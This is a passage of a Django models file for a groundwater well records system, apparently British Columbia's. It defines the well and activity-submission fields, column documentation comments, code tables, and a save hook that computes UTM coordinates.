db_comment='Mathematical formulation used to estimate hydraulic parameters.')
boundary_effect = models.ForeignKey(BoundaryEffectCode, db_column='boundary_effect_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Boundary Effect',
db_comment='Valid codes for the boundaries observed in '
'pumping test analysis. i.e. CH, NF.')
aquifer_lithology = models.ForeignKey(
AquiferLithologyCode, db_column='aquifer_lithology_code', blank=True, null=True,
on_delete=models.PROTECT,
verbose_name='Aquifer Lithology',
db_comment=('Valid codes for the type of material an aquifer consists of. i.e., Unconsolidated, '
'Bedrock, Unknown.'))
# Production data related data
yield_estimation_method = models.ForeignKey(
YieldEstimationMethodCode, db_column='yield_estimation_method_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Estimation Method')
yield_estimation_rate = models.DecimalField(
max_digits=7, decimal_places=2, verbose_name='Estimation Rate',
blank=True, null=True, validators=[MinValueValidator(Decimal('0.00'))])
yield_estimation_duration = models.DecimalField(
max_digits=9, decimal_places=2, verbose_name='Estimation Duration',
blank=True, null=True, validators=[MinValueValidator(Decimal('0.01'))])
static_level_before_test = models.DecimalField(
max_digits=7, decimal_places=2, verbose_name='SWL Before Test',
blank=True, null=True, validators=[MinValueValidator(Decimal('0.0'))])
drawdown = models.DecimalField(
max_digits=7, decimal_places=2, blank=True, null=True,
validators=[MinValueValidator(Decimal('0.00'))])
hydro_fracturing_performed = models.BooleanField(
default=False, verbose_name='Hydro-fracturing Performed?',
choices=((False, 'No'), (True, 'Yes')))
hydro_fracturing_yield_increase = models.DecimalField(
max_digits=7, decimal_places=2,
verbose_name='Well Yield Increase Due to Hydro-fracturing',
blank=True, null=True,
validators=[MinValueValidator(Decimal('0.00'))])
recommended_pump_depth = models.DecimalField(max_digits=7, decimal_places=2, blank=True, null=True,
verbose_name='Recommended pump depth',
validators=[MinValueValidator(Decimal('0.00'))])
recommended_pump_rate = models.DecimalField(max_digits=7, decimal_places=2, blank=True, null=True,
verbose_name='Recommended pump rate',
validators=[MinValueValidator(Decimal('0.00'))])
class Meta:
db_table = 'well'
verbose_name = 'A well record'
def __str__(self):
if self.well_tag_number:
return '%d %s' % (self.well_tag_number, self.street_address)
else:
return 'No well tag number %s' % (self.street_address)
# Custom JSON serialisation for Wells. Expand as needed.
def as_dict(self):
return {
"latitude": self.latitude,
"longitude": self.longitude,
"guid": self.well_guid,
"identification_plate_number": self.identification_plate_number,
"street_address": self.street_address,
"well_tag_number": self.well_tag_number
}
@property
def licenced_status(self):
return LicencedStatusCode.objects.get(licenced_status_code='LICENSED') if self.licences.all().exists() \
else LicencedStatusCode.objects.get(licenced_status_code='UNLICENSED')
@property
def latitude(self):
if self.geom:
return self.geom.y
else:
return None
@property
def longitude(self):
if self.geom:
return self.geom.x
else:
return None
db_table_comment = ('Describes how a well was constructed, altered, decomissioned over time. Includes '
'information related to who owns the well, location of well, the lithologic '
'description as well as other information related to the construction of the well.')
db_column_supplemental_comments = {
"alternative_specs_submitted":"Indicates if an alternative specification was used for siting of a water supply well or a permanent dewatering well, or if an alternative specification was used for decommissioning a well.",
"aquifer_id":"System generated sequential number assigned to each aquifer. It is widely used by groundwater staff as it is the only consistent unique identifier for a mapped aquifer. It is also commonly referred to as Aquifer Number.",
"artesian_flow":"Measurement of the artesian well's water flow that occurs naturally due to inherent water pressure in the well. Pressure within the aquifer forces the groundwater to rise above the land surface naturally without using a pump. Flowing artesian wells can flow on an intermittent or continuous basis. Recorded in US Gallons Per Minute.",
"artesian_pressure":"Pressure of the water coming out of an artesian well as measured at the time of construction. Measured in PSI (pounds per square inch).",
"artesian_pressure_head":"Pressure of the water coming out of an artesian well as measured at the time of construction. Measured in ft agl (feet above ground level).",
"artesian_conditions":"Artesian conditions arise when there is a movement of groundwater from a recharge area under a confining formation to a point of discharge at a lower elevation. An example of this is a natural spring, or in the example of the drilling industry, a flowing water well.",
"bcgs_id":"TO BE DELETED?",
"boundary_effect_code":"Valid codes for the boundaries observed in pumping test analysis. i.e. CH, NF.",
"decommission_backfill_material":"Backfill material used to decommission a well. ",
"decommission_details":"Information about the decommissioning of a well as provided by the driller.",
"decommission_end_date":"The end date of when the decommissioning of the well was completed.",
"decommission_method_code":"Valid code for the method used to fill the well to decommission it permanently.",
"decommission_reason":"The reason why the well was decomssioned as provided by the driller.",
"decommission_sealant_material":"Describes the sealing material or a mixture of the sealing material used to decommission a well.",
"decommission_start_date":"The start date of when the decommissioning of the well began.",
"development_hours":"Total hours devoted to developing as well ('develop' in relation to a well, means remove from an aquifer the fine sediment and other organic or inorganic material that immediately surrounds the well screen, the drill hole or the intake area at the bottom of the well)",
"development_notes":"Information about the development of the well.",
"drawdown":"Drawdown is the drop in water level when water is being pumped. ",
"ems":"Unique ID assigned through the Environmental Monitoring System (EMS) that relates to water quality data within the EMS application.",
"filter_pack_from":"The starting depth in feet below ground level at which the filter pack was placed.",
"filter_pack_material_code":"Codes for the materials used in the filter pack, which are placed in the annulus of the well between the borehole wall and the well screen, and are used to settle-out fine grained particles that may otherwise enter the well. I.e. Fine gravel, very course sand, very fine gravel, other",
"filter_pack_material_size_code":"Codes for the sizes of the material used in the well filter pack. E.g. 1.0 - 2.0 mm, 2.0 - 4.0 mm, 4.0 - 8.0 mm.",
"filter_pack_thickness":"The thickness in inches of the filter pack material used for a well.",
"filter_pack_to":"The end depth in feet below ground level at which the filter pack was placed.",
"final_casing_stick_up":"The length in inches of the production casing in the well that is above the surface of the ground adjacent to the well, or the floor of the well sump, pump house or well pit.",
"finished_well_depth":"The depth at which the well was 'finished'. It can be shallower than the total well depth which is the total depth drilled. Recorded in feet below ground level.",
"geom":"Estimated point location of the well. All UTM coordinates are converted to this geom column for storage and display. The geometry of the well should be considered aong with the coordinate acquisition code to get the estimated accuracy of the location.",
"ground_elevation":"The elevation above sea-level of the ground surface at the well, measured in feet.",
"ground_elevation_method_code":"Code for method used to determine the ground elevation of a well. E.g. GPS, Altimeter, Differential GPS, Level, 1:50,000 map, 1:20,000 map.",
"hydraulic_conductivity":"The ability of the rock or unconsolidated material to transmit water.",
"hydro_fracturing_performed":"Indicates if high pressure water was injected into the well to help break apart the bedrock in order to get more water out of the well.",
"hydro_fracturing_yield_increase":"How much the well yeild increases once hydro fracturing was performed, recorded in US gallons per minute.",
"id_plate_attached_by":"The person who attached the id plate to the well.",
"identification_plate_number":"Steel plate with a unique number that is attached to wells as required wells under the Groundwater Protection Regulationsuch as water supply wells, recharge or injection wells made by drilling or boring, and permanent dewatering wells.",
"intended_water_use_code":"The intended use of the water in a water supply well as reported by the driller at time of work completion on the well. E.g, DOM, IRR, DWS, COM, UNK, OTHER",
"internal_comments":"Staff only comments and information related to the well, and for internal use only, not to be made public.",
"land_district_code":"Codes used to identify legal land district used to help identify the property where the well is located. E.g. Alberni, Barclay, Cariboo.",
"legal_pid":"A Parcel Identifier or PID is a nine-digit number that uniquely identifies a parcel in the land title register of in BC. The Registrar of Land Titles assigns PID numbers to parcels for which a title is being entered in the land title register as a registered title. The Land Title Act refers to the PID as “the permanent parcel identifier”.",
"licenced_status_code":"Valid licensing options granted to a well under the Water Sustainability Act. This information comes from eLicensing. i.e. Unlicensed, Licensed, Historical.",
"liner_diameter":"Diameter of the liner placed inside the well. Measured in inches.",
"liner_from":"Depth below ground level at which the liner starts inside the well. Measured in feet.",
"liner_material_code":"Code that describes the material noted for lithology. E.g. Rock, Clay, Sand, Unspecified,",
"liner_thickness":"Thickness of the liner inside the well. Measured in inches.",
"liner_to":"Depth below ground level at which the liner ends inside the well. Measured in feet.",
"other_screen_bottom":"Describes the type of bottom installed on a well screen when the bottom type is different from all the types in the screen bottom drop down list and the data submitter picks 'Other ' from the list.",
"other_screen_material":"Describes the material that makes up the screen on a well when the material is different from all the drop down options and the data submitter picks 'Other ' from the list.",
"owner_city":"City where the owner of the well resides.",
"owner_email":"Email address of the well owner, not to be published to the public. ",
"owner_full_name":"First name and last name of the well owner. ",
"owner_mailing_address":"Street name and number of the well owner.",
"owner_postal_code":"Postal code of the well owner attached to the owner mailing address.",
"owner_tel":"Telephone number for the well owner, not to be published to the public.",
"province_state_code":"Province or state code used for the mailing address for the company",
"recommended_pump_depth":"Depth of the a pump placed within the well, as recommended by the well driller or well pump installer, measured in feet below depth of the top of the production casing.",
"recommended_pump_rate":"The rate at which to withdraw water from the well as recommended by the well driller or well pump installer, measured in US gallons per minute.",
"screen_bottom_code":"Valid categories used to identify the type of bottom on a well screen. It provides for a standard commonly understood code and description for screen bottoms. Some examples include: Bail, Plate, Plug. 'Other' can also be specified.",
"screen_information":"Information about the screen that is not captured elsewhere, as provided by the well driller.",
"screen_intake_method_code":"Valid categories used to identify the type of intake mechanism for a well screen. It provides for a standard commonly understood code and description for screen intake codes. Some examples include: Open bottom, Screen, Uncased hole.",
"screen_material_code":"Describes the different materials that makes up the screen on a well. E.g. Plastic, Stainless Steel, Other.",
"screen_opening_code":"Valid categories used to identify the type of opening on a well screen. It provides for a standard commonly understood code and description for screen openings. E.g. Continuous Slot, Perforated Pipe, Slotted.",
"screen_type_code":"Valid categories for the type of well screen installed in a well. i.e. Pipe size, Telescope, Other",
"specific_storage":"The volume of water that the aquifer releases from storage, per volume per aquifer of hydraulic unit head.",
"static_level_before_test":"Resting static water level prior to pumping, measured in feet below ground level or feet below top of the production casing.",
"storativity":"The storativity (or storage coefficient ) is the amount of water stored or released per unit area of aquifer given unit change in head. ",
"surface_seal_depth":"The depth at the bottom of the surface seal, measured in feet.",
"surface_seal_material_code":"Valid materials used for creating the surface seal for a well. A surface seal is a plug that prevents surface runoff from getting into the aquifer or well and contaminating the water. E.g. Bentonite clay, Concrete grout, Sand cement grout, Other.",
"surface_seal_method_code":"Valid methods used to create the surface seal for a well. i.e. Poured, Pumped, Other.",
"surface_seal_thickness":"The thickness of the surface sealant placed in the annular space around the outside of the outermost well casing, measured in inches.",
"total_depth_drilled":"Total depth drilled when constructing or altering a well. It may be different from the finished well depth which can be shallower than the total well depth. Measured in feet below ground level.",
"transmissivity":"Transmissivity is the rate of flow under a unit hydraulic gradient through a unit width of aquifer of thickness ",
"water_quality_colour":"Valid codes for the colour of the water as recorded at time of work. E.g. Orange, Black, Clear, Other",
"water_quality_odour":"Description of the odour of the water as recorded at time of work.",
"well_cap_type":"Description of the type of well cap used on the well.",
"well_class_code":"Valid classifications as defined in the Groundwater Protection Regulation of the Water Sustainability Act. i.e. Water Supply, Monitoring, Recharge, Injection, Dewatering, Drainage, Remediation, Geotechnical, Closed-loop geoexchange.",
"well_disinfected":"Indicates if the well was disinfected after the well construction or alteration was completed.",
"well_orientation":"Describes the physical orientation of a well as being either horizontal or vertical.",
"well_publication_status_code":"Codes that describe if a well record is published for public consumption or unpublished and not available to the public due to data duplication and other data quality issues.",
"well_tag_number":"System generated sequential number assigned to each well. It is widely used by groundwater staff as it is the only consistent unique identifier for each well. It is different from a well ID plate number.",
"well_yield_unit_code":"Codes for the unit of measure that was used for the well yield. All codes except the U.S. Gallons per Minute has been retired as all data from April 2019 will be reported in U.S. Gallons per Minute. E.g of other codes that have been used in the past are Gallons per Minute (U.S./Imperial), Dry Hole, Unknown Yield.",
"yield_estimation_duration":"Total length of time that a well yield test took to complete, measured in hours.",
"yield_estimation_method_code":"Codes for the valid methods that can be used to estimate the well yield. E.g. Air Lifting, Bailing, Pumping, Other.",
"yield_estimation_rate":"Rate at which the well water was pumped during the well yield test, measured in US gallons per minute.",
}
@receiver(pre_save, sender=Well)
def update_utm(sender, instance, **kwargs):
if instance.geom and (-180 < instance.geom.x < 180): # only update utm when geom is valid
utm_zone = math.floor((instance.geom.x + 180) / 6) + 1
coord_transform = CoordTransform(SpatialReference(4326), SpatialReference(32600 + utm_zone))
utm_point = instance.geom.transform(coord_transform, clone=True)
instance.utm_zone_code = utm_zone
# We round to integers because easting/northing is only precise to 1m. The DB column is also an integer type.
instance.utm_easting = round(utm_point.x)
instance.utm_northing = round(utm_point.y)
class CasingMaterialCode(CodeTableModel):
"""
The material used for casing a well, e.g., Cement, Plastic, Steel.
"""
code = models.CharField(primary_key=True, max_length=10,
editable=False, db_column='casing_material_code')
description = models.CharField(max_length=100)
class Meta:
db_table = 'casing_material_code'
ordering = ['display_order', 'description']
db_table_comment = 'Describes the material that the casing is made of.'
def __str__(self):
return self.description
class CasingCode(CodeTableModel):
"""
Type of Casing used on a well
"""
code = models.CharField(primary_key=True, max_length=10,
editable=False, db_column='casing_code')
description = models.CharField(max_length=100)
class Meta:
db_table = 'casing_code'
ordering = ['display_order', 'description']
db_table_comment = ('Describes the casing component (piping or tubing installed in a well) as either '
'production (inner tube), surface (outer tube), or open hole.')
def __str__(self):
return self.description
# TODO: This class needs to be moved to submissions.models (in order to do that, the fk references for a
# number of other models needs to be updated)
@reversion.register()
class ActivitySubmission(AuditModelStructure):
"""
Activity information on a Well submitted by a user.
Note on db_comments: db_comment properties on model columns are
overriden by the db_column_supplemental_comments provided below.
db_column_supplemental_comments provides an easier way for the DA to add/update
comments in bulk.
"""
filing_number = models.AutoField(primary_key=True)
activity_submission_guid = models.UUIDField(
primary_key=False, default=uuid.uuid4, editable=False)
well = models.ForeignKey(
Well, db_column='well_tag_number', on_delete=models.PROTECT, blank=True, null=True,
db_comment=('The file number assigned to a particular well in the in the province\'s Groundwater '
'Wells and Aquifers application.'))
well_activity_type = models.ForeignKey(
'submissions.WellActivityCode', db_column='well_activity_code', on_delete=models.PROTECT,
null=True, verbose_name='Type of Work')
well_status = models.ForeignKey(
WellStatusCode, db_column='well_status_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Well Status',
db_comment=('Status of a well indicates whether the report relates to the construction,'
' alteration, or decommission of the well; e.g., Construction, Alteration,'
' Abandoned, Deccommission.'))
well_publication_status = models.ForeignKey(
WellPublicationStatusCode, db_column='well_publication_status_code',
on_delete=models.PROTECT, verbose_name='Well Publication Status',
null=True, default='Published')
well_class = models.ForeignKey(
WellClassCode, blank=True, null=True, db_column='well_class_code',
on_delete=models.PROTECT, verbose_name='Well Class',
db_comment=('Valid classifications as defined in the Groundwater Protection Regulation of the'
' Water Act. i.e. Water Supply, Monitoring, Recharge, Injection, Dewatering,'
' Drainage, Remediation, Geotechnical, Closed-loop geoexchange.'))
well_subclass = models.ForeignKey(WellSubclassCode, db_column='well_subclass_guid',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Well Subclass')
intended_water_use = models.ForeignKey(
IntendedWaterUseCode, db_column='intended_water_use_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Intended Water Use',
db_comment=('The intended use of the water in a water supply well as reported by the driller at'
' time of work completion on the well. E.g DOM, IRR, DWS, COM'))
# Driller responsible should be a required field on all submissions, but for legacy well
# information this may not be available, so we can't enforce this on a database level.
person_responsible = models.ForeignKey('registries.Person', db_column='person_responsible_guid',
on_delete=models.PROTECT,
verbose_name='Person Responsible for Drilling',
blank=True, null=True)
company_of_person_responsible = models.ForeignKey(
'registries.Organization', db_column='org_of_person_responsible_guid', on_delete=models.PROTECT,
verbose_name='Company of person responsible for drilling', null=True, blank=True)
driller_name = models.CharField(
max_length=200, blank=True, null=True, verbose_name='Name of Person Who Did the Work')
consultant_name = models.CharField(
max_length=200, blank=True, null=True, verbose_name='Consultant Name')
consultant_company = models.CharField(
max_length=200, blank=True, null=True, verbose_name='Consultant Company')
# Work start & end date should be required fields on all submissions, but for legacy well
# information this may not be available, so we can't enforce this on a database level.
work_start_date = models.DateField(
verbose_name='Work Start Date', null=True, blank=True,
db_comment=('The date when an activity such as well construction, well alteration, or well '
'decommission was started.'))
work_end_date = models.DateField(
verbose_name='Work End Date', null=True, blank=True,
db_comment=('The date when an activity such as well construction, well alteration, or well '
'decommission was ended.'))
construction_start_date = models.DateField(
null=True, verbose_name="Construction Start Date",
db_comment='The date when well construction started.')
construction_end_date = models.DateField(
null=True, verbose_name="Construction Date",
db_comment='The date when well construction ended.')
alteration_start_date = models.DateField(
null=True, verbose_name="Alteration Start Date",
db_comment='The date when alteration on a well started.')
alteration_end_date = models.DateField(
null=True, verbose_name="Alteration Date")
decommission_start_date = models.DateField(
null=True, verbose_name="Decommission Start Date",
db_comment='The start date of when the well was decommissioned.')
decommission_end_date = models.DateField(
null=True, verbose_name="Decommission Date")
owner_full_name = models.CharField(
max_length=200, verbose_name='Owner Name', blank=True, null=True)
owner_mailing_address = models.CharField(
max_length=100, verbose_name='Mailing Address', blank=True, null=True)
owner_city = models.CharField(
max_length=100, verbose_name='Town/City', blank=True, null=True)
owner_province_state = models.ForeignKey(
ProvinceStateCode, db_column='province_state_code', on_delete=models.PROTECT, verbose_name='Province',
blank=True, null=True)
owner_postal_code = models.CharField(
max_length=10, blank=True, null=True, verbose_name='Postal Code')
owner_email = models.EmailField(
null=True, blank=True, verbose_name='Email address')
owner_tel = models.CharField(
null=True, blank=True, max_length=25, verbose_name='Telephone number')
street_address = models.CharField(
max_length=100, blank=True, null=True, verbose_name='Street Address')
city = models.CharField(max_length=50, blank=True, null=True,
verbose_name='Town/City')
legal_lot = models.CharField(
max_length=10, blank=True, null=True, verbose_name='Lot')
legal_plan = models.CharField(
max_length=20, blank=True, null=True, verbose_name='Plan')
legal_district_lot = models.CharField(
max_length=20, blank=True, null=True, verbose_name='District Lot')
legal_block = models.CharField(
max_length=10, blank=True, null=True, verbose_name='Block')
legal_section = models.CharField(
max_length=10, blank=True, null=True, verbose_name='Section')
legal_township = models.CharField(
max_length=20, blank=True, null=True, verbose_name='Township')
legal_range = models.CharField(
max_length=10, blank=True, null=True, verbose_name='Range')
land_district = models.ForeignKey(LandDistrictCode, db_column='land_district_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Land District')
legal_pid = models.PositiveIntegerField(
blank=True, null=True, verbose_name='PID')
well_location_description = models.CharField(
max_length=500, blank=True, null=True, verbose_name='Well Location Description',
db_comment=('Descriptive details of a well\'s location. E.g. the well is located 20\' south west '
'of the house; or the well is located in the pump house near the pond.'))
identification_plate_number = models.PositiveIntegerField(
blank=True, null=True, verbose_name='Identification Plate Number',
db_comment=('Steel plate with a unique number that is attached to required wells under the '
'groundwater protection regulations such as water supply wells, recharge or injection '
'wells made by drilling or boring, and permanent dewatering wells.'))
well_identification_plate_attached = models.CharField(
max_length=500, blank=True, null=True, verbose_name='Well Identification Plate Is Attached',
db_comment=('Description of where the well identification plate has been attached on or near the '
'well.'))
id_plate_attached_by = models.CharField(
max_length=100, blank=True, null=True, verbose_name='Well identification plate attached by')
# Contains Well Longitude and Latitude in that order
# Values are BC Albers. but we are using WGS84 Lat Lon to avoid rounding errors
geom = models.PointField(
blank=True, null=True, verbose_name='Geo-referenced Location of the Well', srid=4326)
coordinate_acquisition_code = models.ForeignKey(
CoordinateAcquisitionCode, blank=True, null=True, verbose_name="Location Accuracy Code",
db_column='coordinate_acquisition_code', on_delete=models.PROTECT,
db_comment=('Codes for the accuracy of the coordinate position, which is best estimated based on'
' the information provided by the data submitter and analysis done by staff. E.g. A,'
' B, C.'))
ground_elevation = models.DecimalField(
max_digits=10, decimal_places=2, blank=True, null=True, verbose_name='Ground Elevation')
ground_elevation_method = models.ForeignKey(GroundElevationMethodCode,
db_column='ground_elevation_method_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Elevation Determined By')
drilling_methods = models.ManyToManyField(DrillingMethodCode, verbose_name='Drilling Methods',
blank=True)
well_orientation = models.BooleanField(null=True, verbose_name='Orientation of Well', choices=(
(True, 'vertical'), (False, 'horizontal')))
well_orientation_status = models.ForeignKey(WellOrientationCode, db_column='well_orientation_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Well Orientation Code')
water_supply_system_name = models.CharField(
max_length=80, blank=True, null=True, verbose_name='Water Supply System Name',
db_comment=('Name or identifier given to a well that serves as a water supply system. Often, the '
'name is a reflection of the community or system it serves, e.g. Town of Osoyoos or '
'Keremeos Irrigation District.'))
water_supply_system_well_name = models.CharField(
max_length=80, blank=True, null=True, verbose_name='Water Supply System Well Name',
db_comment=('The specific name given to a water supply system well. Often, the name reflects which '
'well it is within the system, e.g. Well 1 or South Well'))
surface_seal_material = models.ForeignKey(SurfaceSealMaterialCode, db_column='surface_seal_material_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Surface Seal Material')
surface_seal_depth = models.DecimalField(
max_digits=5, decimal_places=2, blank=True, null=True, verbose_name='Surface Seal Depth')
surface_seal_thickness = models.DecimalField(max_digits=7, decimal_places=2, blank=True, null=True,
verbose_name='Surface Seal Thickness',
validators=[MinValueValidator(Decimal('0.00'))])
surface_seal_method = models.ForeignKey(SurfaceSealMethodCode, db_column='surface_seal_method_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Surface Seal Installation Method')
backfill_above_surface_seal = models.CharField(
max_length=250, blank=True, null=True, verbose_name='Backfill Material Above Surface Seal')
backfill_above_surface_seal_depth = models.DecimalField(
max_digits=7, decimal_places=2, blank=True, null=True, verbose_name='Backfill Depth')
backfill_depth = models.DecimalField(
max_digits=7, decimal_places=2, blank=True, null=True, verbose_name='Backfill Depth',
db_comment='The depth in feet of any backfill placed above the surface seal of a well.')
backfill_type = models.CharField(
max_length=250, blank=True, null=True, verbose_name='Backfill Material Above Surface Seal',
db_comment=('Indicates the type of backfill material that is placed above the surface seal'
' during the construction or alteration of well.'))
liner_material = models.ForeignKey(LinerMaterialCode, db_column='liner_material_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Liner Material')
liner_diameter = models.DecimalField(max_digits=7, decimal_places=2, blank=True, null=True,
verbose_name='Liner Diameter',
validators=[MinValueValidator(Decimal('0.00'))])
liner_thickness = models.DecimalField(max_digits=5, decimal_places=3, blank=True, null=True,
verbose_name='Liner Thickness',
validators=[MinValueValidator(Decimal('0.00'))])
liner_from = models.DecimalField(max_digits=7, decimal_places=2, blank=True, null=True,
verbose_name='Liner From',
validators=[MinValueValidator(Decimal('0.00'))])
liner_to = models.DecimalField(max_digits=7, decimal_places=2, blank=True, null=True,
verbose_name='Liner To', validators=[MinValueValidator(Decimal('0.01'))])
screen_intake_method = models.ForeignKey(ScreenIntakeMethodCode, db_column='screen_intake_method_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Intake')
screen_type = models.ForeignKey(ScreenTypeCode, db_column='screen_type_code',
on_delete=models.PROTECT, blank=True, null=True, verbose_name='Type')
screen_material = models.ForeignKey(ScreenMaterialCode, db_column='screen_material_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Material')
other_screen_material = models.CharField(
max_length=50, blank=True, null=True, verbose_name='Specify Other Screen Material')
screen_opening = models.ForeignKey(ScreenOpeningCode, db_column='screen_opening_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Opening')
screen_bottom = models.ForeignKey(ScreenBottomCode, db_column='screen_bottom_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Bottom')
other_screen_bottom = models.CharField(
max_length=50, blank=True, null=True, verbose_name='Specify Other Screen Bottom')
screen_information = models.CharField(
max_length=300, blank=True, null=True, verbose_name="Screen Information"
)
filter_pack_from = models.DecimalField(max_digits=7, decimal_places=2, blank=True, null=True,
verbose_name='Filter Pack From',
validators=[MinValueValidator(Decimal('0.00'))])
filter_pack_to = models.DecimalField(max_digits=7, decimal_places=2, blank=True, null=True,
verbose_name='Filter Pack To',
validators=[MinValueValidator(Decimal('0.01'))])
filter_pack_thickness = models.DecimalField(max_digits=5, decimal_places=3, blank=True, null=True,
verbose_name='Filter Pack Thickness',
validators=[MinValueValidator(Decimal('0.00'))])
filter_pack_material = models.ForeignKey(FilterPackMaterialCode, db_column='filter_pack_material_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Filter Pack Material')
filter_pack_material_size = models.ForeignKey(FilterPackMaterialSizeCode,
db_column='filter_pack_material_size_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Filter Pack Material Size')
development_methods = models.ManyToManyField(DevelopmentMethodCode, blank=True,
verbose_name='Development Methods')
development_hours = models.DecimalField(max_digits=9, decimal_places=2, blank=True, null=True,
verbose_name='Development Total Duration',
validators=[MinValueValidator(Decimal('0.00'))])
development_notes = models.CharField(
max_length=255, blank=True, null=True, verbose_name='Development Notes')
water_quality_characteristics = models.ManyToManyField(
WaterQualityCharacteristic, db_table='activity_submission_water_quality', blank=True,
verbose_name='Obvious Water Quality Characteristics')
water_quality_colour = models.CharField(
max_length=60, blank=True, null=True, verbose_name='Water Quality Colour')
water_quality_odour = models.CharField(
max_length=60, blank=True, null=True, verbose_name='Water Quality Odour')
total_depth_drilled = models.DecimalField(
max_digits=7, decimal_places=2, blank=True, null=True, verbose_name='Total Depth Drilled')
finished_well_depth = models.DecimalField(
max_digits=7, decimal_places=2, blank=True, null=True, verbose_name='Finished Well Depth',
db_comment=('The depth at which the well was \'finished\'. It can be shallower from the total well '
'depth which is the total depth at which the well was drilled. The finished depth is '
'represented in units of feet bgl (below ground level).'))
final_casing_stick_up = models.DecimalField(
max_digits=6, decimal_places=3, blank=True, null=True, verbose_name='Final Casing Stick Up')
bedrock_depth = models.DecimalField(
max_digits=7, decimal_places=2, blank=True, null=True, verbose_name='Depth to Bedrock')
static_water_level = models.DecimalField(
max_digits=7, decimal_places=2, blank=True, null=True, verbose_name='Static Water Level (BTOC)',
db_comment=('The level (depth below ground) to which water will naturally rise in a well without '
'pumping, measured in feet.'))
well_yield = models.DecimalField(
max_digits=8, decimal_places=3, blank=True, null=True, verbose_name='Estimated Well Yield')
artesian_flow = models.DecimalField(
max_digits=7, decimal_places=2, blank=True, null=True, verbose_name='Artesian Flow',
db_comment=('Measurement of the artesian well\'s water flow that occurs naturally due to'
' inherent water pressure in the well. Pressure within the aquifer forces the'
' groundwater to rise above the land surface naturally without using a pump. Flowing'
' artesian wells can flow on an intermittent or continuous basis. Measured in US'
' Gallons/minute.'))
artesian_pressure = models.DecimalField(
max_digits=7, decimal_places=2, blank=True, null=True, verbose_name='Artesian Pressure',
db_comment=('Pressure of the water coming out of an artesian well as measured at the time of'
' construction. Measured in PSI (pounds per square inch).'))
artesian_pressure_head = models.DecimalField(
max_digits=7, decimal_places=2, blank=True, null=True, verbose_name='Artesian Pressure head',
db_comment=('Pressure of the water coming out of an artesian well as measured at the time of '
'construction. Measured in ft agl (feet above ground level).'))
artesian_conditions = models.BooleanField(null=True, verbose_name='Artesian Conditions',
db_comment=('Artesian conditions arise when there is a movement of '
'groundwater from a recharge area under a confining '
'formation to a point of discharge at a lower elevation. '
'An example of this is a natural spring, or in the '
'example of the drilling industry, a flowing water well.'))
well_cap_type = models.CharField(
max_length=40, blank=True, null=True, verbose_name='Well Cap Type')
well_disinfected = models.BooleanField(null=True, verbose_name='Well Disinfected?',
choices=((False, 'No'), (True, 'Yes')))
well_disinfected_status = models.ForeignKey(WellDisinfectedCode, db_column='well_disinfected_code',
on_delete=models.PROTECT, blank=True, null=True,
verbose_name='Well Disinfected Code')
comments = models.CharField(max_length=3000, blank=True, null=True)
internal_comments = models.CharField(
max_length=3000, blank=True, null=True)
alternative_specs_submitted = models.BooleanField(
null=True,
verbose_name='Alternative specs submitted (if required)', choices=((False, 'No'), (True, 'Yes')))
well_yield_unit = models.ForeignKey(
WellYieldUnitCode, db_column='well_yield_unit_code', on_delete=models.PROTECT, blank=True, null=True)
# want to be integer in future
diameter = models.CharField(max_length=9, blank=True, null=True)
ems = models.CharField(max_length=30, blank=True, null=True)
# Observation well details
observation_well_number = models.CharField(
max_length=30, blank=True, null=True, verbose_name="Observation Well Number",
db_comment=('A unique number assigned to a well that has been included as part '
'of the Provincial Groundwater Observation Well Network.'))
observation_well_status = models.ForeignKey(
ObsWellStatusCode, db_column='obs_well_status_code', blank=True, null=True,
verbose_name="Observation Well Status", on_delete=models.PROTECT,
db_comment=('Status of an observation well within the Provincial Groundwater Observation Well '
'Network. I.e. Active is a well that is currently being used to collect groundwater '
'information, and inactive is a well that is no longer being used to collect '
'groundwater information.'))
# aquifer association
aquifer = models.ForeignKey(
'aquifers.Aquifer', db_column='aquifer_id', on_delete=models.PROTECT, blank=True,
null=True, verbose_name='Aquifer ID Number',
db_comment=('System generated unique sequential number assigned to each mapped aquifer. The'
' aquifer_id identifies which aquifer a well is in. An aquifer can have multiple'
' wells, while a single well can only be in one aquifer.'))
# Decommission info
decommission_reason = models.CharField(
max_length=250, blank=True, null=True, verbose_name="Reason for Decommission")
decommission_method = models.ForeignKey(
DecommissionMethodCode, db_column='decommission_method_code', blank=True, null=True,
verbose_name="Method of Decommission", on_delete=models.PROTECT)
decommission_sealant_material = models.CharField(
max_length=100, blank=True, null=True, verbose_name="Sealant Material")
decommission_backfill_material = models.CharField(
max_length=100, blank=True, null=True, verbose_name="Backfill Material")
decommission_details = models.CharField(
max_length=250, blank=True, null=True, verbose_name="Decommission Details")
# Aquifer related data
aquifer_vulnerability_index = models.DecimalField(
max_digits=10, decimal_places=0, blank=True, null=True, verbose_name='AVI')
storativity = models.DecimalField(
max_digits=8, decimal_places=7, blank=True, null=True, verbose_name='Storativity')
transmissivity = models.DecimalField(
max_digits=30, decimal_places=10, blank=True, null=True, verbose_name='Transmissivity')
hydraulic_conductivity = models.TextField(
max_length=100,
blank=True,
null=True,
verbose_name='Hydraulic Conductivity')
specific_storage = models.TextField(
max_length=100,
blank=True,
null=True,
verbose_name='Specific Storage')
specific_yield = models.DecimalField(
max_digits=5, decimal_places=2, blank=True, null=True, verbose_name='Specific Yield')
testing_method = models.TextField(
max_length=100,
blank=True,
null=True,
verbose_name='Testing Method')
testing_duration = models.PositiveIntegerField(blank=True, null=True)
analytic_solution_type = models.DecimalField(
max_digits=5, decimal_places=2, blank=True, null=True, verbose_name='Analytic Solution Type')
